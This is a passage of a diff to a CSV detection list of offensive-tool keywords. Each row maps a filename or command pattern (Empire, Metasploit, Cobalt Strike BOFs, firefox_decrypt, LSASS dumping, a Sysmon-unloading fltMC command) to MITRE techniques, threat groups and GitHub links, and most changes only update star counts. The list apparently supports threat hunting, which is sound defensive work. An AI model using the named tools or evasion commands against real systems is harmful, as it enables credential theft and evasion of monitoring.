Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-WMILocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FireBuster.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*fireeye*commando*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
 "*FireFart*dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","1","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z"
 "*firefox/FakeUpdate_files/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
-"*firefox_decrypt.py*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1622","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z"
-"*firefox_decrypt-main*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1622","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z"
-"*firefox_extension_bindshell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*firefox_extension_reverse_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*firefox_privilege_escalation.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*firefox_privilege_escalation_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*firefox_smil_uaf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*FireListener.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*firefox_decrypt.py*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*firefox_decrypt-main*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*firefox_extension_bindshell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*firefox_extension_reverse_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*firefox_privilege_escalation.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*firefox_privilege_escalation_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*firefox_smil_uaf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*FireListener.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Firesheep/*","offensive_tool_keyword","firesheep","Free program for HTTP session hijacking attacks.","T1550 - T1555 - T1559 - T1565","TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://codebutler.github.io/firesheep/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Firewall_Walker_BOF*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*fishing_with_hollowing*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" 
@@ -10373,7 +10524,7 @@ "*Flangvik/NetLoader*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*Flangvik/SharpExfiltrate*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*flashupdate.ps1*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*florylsk/NtRemoteLoad*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*florylsk/NtRemoteLoad*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*fltMC* unload SysmonDrv*","offensive_tool_keyword","fltMC","Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. 
network monitoring will still be effective)","T1562.006 - T1562.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1","1","0","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" "*FluxionNetwork*","offensive_tool_keyword","FluxionNetwork","Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues","T1559 - T1189 - T1059 - T1566 - T1056","TA0001 - TA0002 - TA0009","N/A","N/A","Phishing","https://github.com/FluxionNetwork/fluxion","1","1","N/A","N/A","10","4340","1377","2023-08-30T20:11:16Z","2017-04-29T10:22:27Z" "*fodhelperbypass*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -10384,15 +10535,15 @@ "*Follina/Follinadoc*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*for /f %%i in (C:\Windows\IME\ok.txt)*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*for /r c:\windows\system32\ %i in (*sht*.exe)*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - 
T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*-force-forwardableet-ADComputer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*-force-forwardableet-ADComputer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*foreign_access.cna*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass * *","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","0","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.c*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.x64*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 